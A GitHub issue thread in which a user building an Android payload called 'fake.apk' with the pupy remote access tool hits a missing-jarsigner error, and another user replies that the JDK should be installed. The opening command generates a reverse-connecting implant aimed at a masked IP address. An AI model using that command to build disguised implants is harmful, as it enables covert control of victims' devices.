### ISSUE TITLE
pupy error jarsigner: not found

### ISSUE THREAD

**Issue by anonymous920** [n1nj4sec/pupy#608]
when i put
cd pupy
cd pupy
./pupygen.py -O android -o fake.apk connect --host 192.xxx.x.x --transport ssl
and the result is....
./pupygen.py -O android -o fake.apk connect --host 192.xxx.x.x --transport ssl
[+] Generate client: android/x86
[C] launcher: connect
[C] launcher_args: ['--host', '192.xxx.x.x', '--transport', 'ssl']
[C] debug: False
[I] Credentials password:
[+] Required credentials:
[+] SSL_BIND_CERT, SSL_CA_CERT, SSL_CLIENT_CERT, SSL_BIND_KEY, SSL_CLIENT_KEY
[+] generating payload ...
[+] packaging the apk ... (can take 10-20 seconds)
/bin/sh: 1: jarsigner: not found
ERROR:root:Command 'jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore crypto/pupy-apk-release-key.keystore -storepass pupyp4ssword '/tmp/tmp_pupy_xwX98o' pupy_key' returned non-zero exit status 127
Traceback (most recent call last):
File "./pupygen.py", line 691, in 
pupygen(parser.parse_args(), config)
File "./pupygen.py", line 584, in pupygen
compressed=not ( args.uncompressed or args.packer )
File "./pupygen.py", line 392, in generate_binary_from_template
return generator(template, config, compressed), filename, makex
File "./pupygen.py", line 217, in get_edit_apk
res=subprocess.check_output("jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore crypto/pupy-apk-release-key.keystore -storepass pupyp4ssword '%s' pupy_key"%tempapk, shell=True)
File "/usr/lib/python2.7/subprocess.py", line 574, in check_output
raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command 'jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore crypto/pupy-apk-release-key.keystore -storepass pupyp4ssword '/tmp/tmp_pupy_xwX98o' pupy_key' returned non-zero exit status 127
Command 'jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore crypto/pupy-apk-release-key.keystore -storepass pupyp4ssword '/tmp/tmp_pupy_xwX98o' pupy_key' returned non-zero exit status 127
now, this is the error code,
what should i do?

**Comment by glides** [comment]
Install the JDK
jarsigner is in %JAVA_HOME%\bin\jarsigner

**Comment by anonymous920** [comment]
Thanks
I think you are very good man
Your email very useful
Really thank you
-----Original Message-----
